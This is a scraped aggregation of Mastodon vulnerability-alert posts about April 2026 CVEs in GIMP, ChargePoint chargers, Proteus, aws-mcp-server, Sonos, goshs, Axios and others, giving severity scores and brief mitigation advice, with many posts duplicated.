thehackerwire@mastodon.social at 2026-04-11T03:59:58.000Z ##

🟠 CVE-2026-4151 - High (7.8)

GIMP ANI File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-4150
(7.8 HIGH)

EPSS: 0.06%

updated 2026-04-11T03:30:41

2 posts

GIMP PSD File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PSD files. The issue results from the la

thehackerwire@mastodon.social at 2026-04-11T03:55:36.000Z ##

🟠 CVE-2026-4150 - High (7.8)

GIMP PSD File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T03:55:36.000Z ##

🟠 CVE-2026-4150 - High (7.8)

GIMP PSD File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-4157
(7.5 HIGH)

EPSS: 0.19%

updated 2026-04-11T03:30:41

2 posts

ChargePoint Home Flex revssh Service Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of ChargePoint Home Flex devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of OCPP messages. The issue results from the lack of proper v

thehackerwire@mastodon.social at 2026-04-11T03:28:26.000Z ##

🟠 CVE-2026-4157 - High (7.5)

ChargePoint Home Flex revssh Service Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of ChargePoint Home Flex devices. Authentication i...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T03:28:26.000Z ##

🟠 CVE-2026-4157 - High (7.5)

ChargePoint Home Flex revssh Service Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of ChargePoint Home Flex devices. Authentication i...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-4156
(7.5 HIGH)

EPSS: 0.07%

updated 2026-04-11T03:30:41

2 posts

ChargePoint Home Flex OCPP getpreq Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of ChargePoint Home Flex EV chargers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of OCPP messages. The issue results from the lack

thehackerwire@mastodon.social at 2026-04-11T03:28:16.000Z ##

🟠 CVE-2026-4156 - High (7.5)

ChargePoint Home Flex OCPP getpreq Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of ChargePoint Home Flex EV chargers. Auth...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T03:28:16.000Z ##

🟠 CVE-2026-4156 - High (7.5)

ChargePoint Home Flex OCPP getpreq Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of ChargePoint Home Flex EV chargers. Auth...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-4155
(7.5 HIGH)

EPSS: 0.24%

updated 2026-04-11T03:30:41

2 posts

ChargePoint Home Flex Inclusion of Sensitive Information in Source Code Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of ChargePoint Home Flex charging stations. Authentication is not required to exploit this vulnerability. The specific flaw exists within the genpw script. The issue results from the inc

thehackerwire@mastodon.social at 2026-04-11T03:28:07.000Z ##

🟠 CVE-2026-4155 - High (7.5)

ChargePoint Home Flex Inclusion of Sensitive Information in Source Code Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of ChargePoint Home Flex charging ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T03:28:07.000Z ##

🟠 CVE-2026-4155 - High (7.5)

ChargePoint Home Flex Inclusion of Sensitive Information in Source Code Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of ChargePoint Home Flex charging ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5494
(7.8 HIGH)

EPSS: 0.05%

updated 2026-04-11T03:30:41

4 posts

Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within

thehackerwire@mastodon.social at 2026-04-11T03:22:50.000Z ##

🟠 CVE-2026-5494 - High (7.8)

Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User intera...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T03:22:05.000Z ##

🟠 CVE-2026-5494 - High (7.8)

Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User intera...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T03:22:50.000Z ##

🟠 CVE-2026-5494 - High (7.8)

Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User intera...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T03:22:05.000Z ##

🟠 CVE-2026-5494 - High (7.8)

Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User intera...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5059
(9.8 CRITICAL)

EPSS: 1.01%

updated 2026-04-11T03:30:41

4 posts

aws-mcp-server AWS CLI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of aws-mcp-server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the allowed commands list. The issue results from the lack of proper validation of a user-supplie

thehackerwire@mastodon.social at 2026-04-11T03:22:41.000Z ##

🔴 CVE-2026-5059 - Critical (9.8)

aws-mcp-server AWS CLI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of aws-mcp-server. Authentication is not required to exploit this vulnerab...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T03:21:55.000Z ##

🔴 CVE-2026-5059 - Critical (9.8)

aws-mcp-server AWS CLI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of aws-mcp-server. Authentication is not required to exploit this vulnerab...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T03:22:41.000Z ##

🔴 CVE-2026-5059 - Critical (9.8)

aws-mcp-server AWS CLI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of aws-mcp-server. Authentication is not required to exploit this vulnerab...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T03:21:55.000Z ##

🔴 CVE-2026-5059 - Critical (9.8)

aws-mcp-server AWS CLI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of aws-mcp-server. Authentication is not required to exploit this vulnerab...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5495
(7.8 HIGH)

EPSS: 0.05%

updated 2026-04-11T03:30:41

2 posts

Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within

thehackerwire@mastodon.social at 2026-04-11T03:22:08.000Z ##

🟠 CVE-2026-5495 - High (7.8)

Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User intera...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T03:22:08.000Z ##

🟠 CVE-2026-5495 - High (7.8)

Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User intera...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5493
(7.8 HIGH)

EPSS: 0.05%

updated 2026-04-11T03:30:41

2 posts

Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within

thehackerwire@mastodon.social at 2026-04-11T03:21:59.000Z ##

🟠 CVE-2026-5493 - High (7.8)

Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User intera...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T03:21:59.000Z ##

🟠 CVE-2026-5493 - High (7.8)

Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User intera...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5058
(9.8 CRITICAL)

EPSS: 1.01%

updated 2026-04-11T03:30:41

2 posts

aws-mcp-server Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of aws-mcp-server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the allowed commands list. The issue results from the lack of proper validation of a user-supplied string

thehackerwire@mastodon.social at 2026-04-11T03:02:16.000Z ##

🔴 CVE-2026-5058 - Critical (9.8)

aws-mcp-server Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of aws-mcp-server. Authentication is not required to exploit this vulnerability.

...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T03:02:16.000Z ##

🔴 CVE-2026-5058 - Critical (9.8)

aws-mcp-server Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of aws-mcp-server. Authentication is not required to exploit this vulnerability.

...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5144
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-11T03:30:41

2 posts

The BuddyPress Groupblog plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.9.3. This is due to the group blog settings handler accepting the `groupblog-blogid`, `default-member`, and `groupblog-silent-add` parameters from user input without proper authorization checks. The `groupblog-blogid` parameter allows any group admin (including Subscribers wh

thehackerwire@mastodon.social at 2026-04-11T03:01:57.000Z ##

🟠 CVE-2026-5144 - High (8.8)

The BuddyPress Groupblog plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.9.3. This is due to the group blog settings handler accepting the `groupblog-blogid`, `default-member`, and `groupblog-sile...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T03:01:57.000Z ##

🟠 CVE-2026-5144 - High (8.8)

The BuddyPress Groupblog plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.9.3. This is due to the group blog settings handler accepting the `groupblog-blogid`, `default-member`, and `groupblog-sile...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5496
(7.8 HIGH)

EPSS: 0.05%

updated 2026-04-11T01:16:18.830000

4 posts

Labcenter Electronics Proteus PDSPRJ File Parsing Type Confusion Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the

thehackerwire@mastodon.social at 2026-04-11T03:23:00.000Z ##

🟠 CVE-2026-5496 - High (7.8)

Labcenter Electronics Proteus PDSPRJ File Parsing Type Confusion Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User interaction...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T03:22:15.000Z ##

🟠 CVE-2026-5496 - High (7.8)

Labcenter Electronics Proteus PDSPRJ File Parsing Type Confusion Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User interaction...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T03:23:00.000Z ##

🟠 CVE-2026-5496 - High (7.8)

Labcenter Electronics Proteus PDSPRJ File Parsing Type Confusion Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User interaction...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T03:22:15.000Z ##

🟠 CVE-2026-5496 - High (7.8)

Labcenter Electronics Proteus PDSPRJ File Parsing Type Confusion Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User interaction...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5055
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-11T01:16:18.017000

2 posts

NoMachine Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of NoMachine. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the NoMachine Device Server. The product l

thehackerwire@mastodon.social at 2026-04-11T03:02:06.000Z ##

🟠 CVE-2026-5055 - High (7.8)

NoMachine Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of NoMachine. An attacker must first obtain the ability to execute low...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T03:02:06.000Z ##

🟠 CVE-2026-5055 - High (7.8)

NoMachine Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of NoMachine. An attacker must first obtain the ability to execute low...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5054
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-11T01:16:17.890000

2 posts

NoMachine External Control of File Path Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of NoMachine. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of command line parameters. The i

thehackerwire@mastodon.social at 2026-04-11T03:55:17.000Z ##

🟠 CVE-2026-5054 - High (7.8)

NoMachine External Control of File Path Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of NoMachine. An attacker must first obtain the ability to execute low-pri...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T03:55:17.000Z ##

🟠 CVE-2026-5054 - High (7.8)

NoMachine External Control of File Path Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of NoMachine. An attacker must first obtain the ability to execute low-pri...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-4154
(7.8 HIGH)

EPSS: 0.06%

updated 2026-04-11T01:16:17.093000

2 posts

GIMP XPM File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of XPM files. The issue results from the la

thehackerwire@mastodon.social at 2026-04-11T03:22:20.000Z ##

🟠 CVE-2026-4154 - High (7.8)

GIMP XPM File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T03:22:20.000Z ##

🟠 CVE-2026-4154 - High (7.8)

GIMP XPM File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-4153
(7.8 HIGH)

EPSS: 0.06%

updated 2026-04-11T01:16:16.963000

2 posts

GIMP PSP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PSP files. The issue results f

thehackerwire@mastodon.social at 2026-04-11T04:00:25.000Z ##

🟠 CVE-2026-4153 - High (7.8)

GIMP PSP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerabilit...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T04:00:25.000Z ##

🟠 CVE-2026-4153 - High (7.8)

GIMP PSP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerabilit...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-4149
(10.0 CRITICAL)

EPSS: 1.27%

updated 2026-04-11T01:16:16.430000

6 posts

Sonos Era 300 SMB Response Out-Of-Bounds Access Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Sonos Era 300. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the DataOffset field within SMB responses. The issue results from the lack of proper valida

offseq at 2026-04-11T13:00:26.648Z ##

⚠️ CVE-2026-4149: Sonos Era 300 (v17.5) has a CRITICAL remote code execution vulnerability via SMB, allowing kernel-level compromise without auth. No patch yet — restrict SMB access! radar.offseq.com/threat/cve-20

##
thehackerwire@mastodon.social at 2026-04-11T03:55:26.000Z ##

🔴 CVE-2026-4149 - Critical (10)

Sonos Era 300 SMB Response Out-Of-Bounds Access Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Sonos Era 300. Authentication is not required to exploit this vu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
offseq at 2026-04-11T01:30:29.280Z ##

🚨 CRITICAL: CVE-2026-4149 in Sonos Era 300 (v17.5) allows unauth RCE via SMB out-of-bounds flaw (CVSS 10.0). No patch yet — restrict SMB access, monitor advisories. radar.offseq.com/threat/cve-20

##
offseq@infosec.exchange at 2026-04-11T13:00:26.000Z ##

⚠️ CVE-2026-4149: Sonos Era 300 (v17.5) has a CRITICAL remote code execution vulnerability via SMB, allowing kernel-level compromise without auth. No patch yet — restrict SMB access! radar.offseq.com/threat/cve-20 #OffSeq #Sonos #Infosec #RCE

##
thehackerwire@mastodon.social at 2026-04-11T03:55:26.000Z ##

🔴 CVE-2026-4149 - Critical (10)

Sonos Era 300 SMB Response Out-Of-Bounds Access Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Sonos Era 300. Authentication is not required to exploit this vu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
offseq@infosec.exchange at 2026-04-11T01:30:29.000Z ##

🚨 CRITICAL: CVE-2026-4149 in Sonos Era 300 (v17.5) allows unauth RCE via SMB out-of-bounds flaw (CVSS 10.0). No patch yet — restrict SMB access, monitor advisories. radar.offseq.com/threat/cve-20 #OffSeq #Sonos #Vuln #RCE

##

CVE-2026-40188
(7.7 HIGH)

EPSS: 0.03%

updated 2026-04-10T21:37:28

2 posts

### Summary The SFTP command rename sanitizes only the source path and not the destination, so it is possible to write outside of the root directory of the SFTP. ### Details Here is the issue: ```go // helper.go:155-215 func cmdFile(root string, r *sftp.Request, ip string, sftpServer *SFTPServer) error { fullPath, err := sanitizePath(r.Filepath, root) // Source: SANITIZED if err != nil

thehackerwire@mastodon.social at 2026-04-11T04:01:16.000Z ##

🟠 CVE-2026-40188 - High (7.7)

goshs is a SimpleHTTPServer written in Go. From 1.0.7 to before 2.0.0-beta.4, the SFTP command rename sanitizes only the source path and not the destination, so it is possible to write outside of the root directory of the SFTP. This vulnerability ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T04:01:16.000Z ##

🟠 CVE-2026-40188 - High (7.7)

goshs is a SimpleHTTPServer written in Go. From 1.0.7 to before 2.0.0-beta.4, the SFTP command rename sanitizes only the source path and not the destination, so it is possible to write outside of the root directory of the SFTP. This vulnerability ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5483
(8.6 HIGH)

EPSS: 0.06%

updated 2026-04-10T21:31:15

2 posts

A flaw was found in odh-dashboard in Red Hat Openshift AI. This vulnerability in the `odh-dashboard` component of Red Hat OpenShift AI (RHOAI) allows for the disclosure of Kubernetes Service Account tokens through a NodeJS endpoint. This could enable an attacker to gain unauthorized access to Kubernetes resources.

thehackerwire@mastodon.social at 2026-04-11T05:00:38.000Z ##

🟠 CVE-2026-5483 - High (8.5)

A flaw was found in odh-dashboard in Red Hat Openshift AI. This vulnerability in the `odh-dashboard` component of Red Hat OpenShift AI (RHOAI) allows for the disclosure of Kubernetes Service Account tokens through a NodeJS endpoint. This could ena...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T05:00:38.000Z ##

🟠 CVE-2026-5483 - High (8.5)

A flaw was found in odh-dashboard in Red Hat Openshift AI. This vulnerability in the `odh-dashboard` component of Red Hat OpenShift AI (RHOAI) allows for the disclosure of Kubernetes Service Account tokens through a NodeJS endpoint. This could ena...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-6057
(9.8 CRITICAL)

EPSS: 0.13%

updated 2026-04-10T21:16:28.800000

1 posts

FalkorDB Browser 1.9.3 contains an unauthenticated path traversal vulnerability in the file upload API that allows remote attackers to write arbitrary files and achieve remote code execution.

offseq@infosec.exchange at 2026-04-10T10:30:30.000Z ##

CVE-2026-6057: CRITICAL path traversal in FalkorDB Browser 1.9.3 (file upload API). Unauthenticated attackers can write arbitrary files, risking RCE. No patch yet — restrict access and monitor logs. radar.offseq.com/threat/cve-20 #OffSeq #Vulnerability #FalkorDB #InfoSec

##

CVE-2026-40189
(0 None)

EPSS: 0.10%

updated 2026-04-10T20:16:23.890000

4 posts

goshs is a SimpleHTTPServer written in Go. Prior to 2.0.0-beta.4, goshs enforces the documented per-folder .goshs ACL/basic-auth mechanism for directory listings and file reads, but it does not enforce the same authorization checks for state-changing routes. An unauthenticated attacker can upload files with PUT, upload files with multipart POST /upload, create directories with ?mkdir, and delete f

offseq at 2026-04-11T14:30:12.404Z ##

CVE-2026-40189 (CRITICAL): patrickhener goshs <2.0.0-beta.4 has a missing auth bug — attackers can upload, delete, or remove auth files, exposing protected dirs. Upgrade to 2.0.0-beta.4 ASAP. radar.offseq.com/threat/cve-20

##
offseq at 2026-04-11T00:00:40.142Z ##

🚨 CVE-2026-40189: goshs <2.0.0-beta.4 has a CRITICAL auth bypass. Attackers can upload, delete, and remove folder auth to access protected files. Mitigate by upgrading now! radar.offseq.com/threat/cve-20

##
offseq@infosec.exchange at 2026-04-11T14:30:12.000Z ##

CVE-2026-40189 (CRITICAL): patrickhener goshs <2.0.0-beta.4 has a missing auth bug — attackers can upload, delete, or remove auth files, exposing protected dirs. Upgrade to 2.0.0-beta.4 ASAP. radar.offseq.com/threat/cve-20 #OffSeq #CVE202640189 #GoLang #infosec

##
offseq@infosec.exchange at 2026-04-11T00:00:40.000Z ##

🚨 CVE-2026-40189: goshs <2.0.0-beta.4 has a CRITICAL auth bypass. Attackers can upload, delete, and remove folder auth to access protected files. Mitigate by upgrading now! radar.offseq.com/threat/cve-20 #OffSeq #CVE202640189 #infosec #GoLang

##

CVE-2026-40175
(10.0 CRITICAL)

EPSS: 0.24%

updated 2026-04-10T20:16:22.800000

2 posts

Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0, the Axios library is vulnerable to a specific "Gadget" attack chain that allows Prototype Pollution in any third-party dependency to be escalated into Remote Code Execution (RCE) or Full Cloud Compromise (via AWS IMDSv2 bypass). This vulnerability is fixed in 1.15.0.

thehackerwire@mastodon.social at 2026-04-11T04:01:55.000Z ##

🔴 CVE-2026-40175 - Critical (10)

Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0, the Axios library is vulnerable to a specific "Gadget" attack chain that allows Prototype Pollution in any third-party dependency to be escalated into Remote Code E...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-11T04:01:55.000Z ##

🔴 CVE-2026-40175 - Critical (10)

Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0, the Axios library is vulnerable to a specific "Gadget" attack chain that allows Prototype Pollution in any third-party dependency to be escalated into Remote Code E...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40093
(9.1 CRITICAL)

EPSS: 0.06%

updated 2026-04-10T19:55:04

1 posts

### Impact Block timestamp validation enforces that `timestamp >= parent.timestamp` for non-skip blocks and `timestamp == parent.timestamp + MIN_PRODUCER_TIMEOUT` for skip blocks, but there is no visible upper bound check against the wall clock. A malicious block-producing validator can set block timestamps arbitrarily far in the future. This directly affects reward calculations via `Policy::supp

thehackerwire@mastodon.social at 2026-04-10T07:08:16.000Z ##

🟠 CVE-2026-40093 - High (8.1)

nimiq-blockchain provides persistent block storage for Nimiq's Rust implementation. In 1.3.0 and earlier, block timestamp validation enforces that timestamp >= parent.timestamp for non-skip blocks and timestamp == parent.timestamp + MIN_PRODUCER_T...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35641
(8.6 HIGH)

EPSS: 0.01%

updated 2026-04-10T19:45:22

2 posts

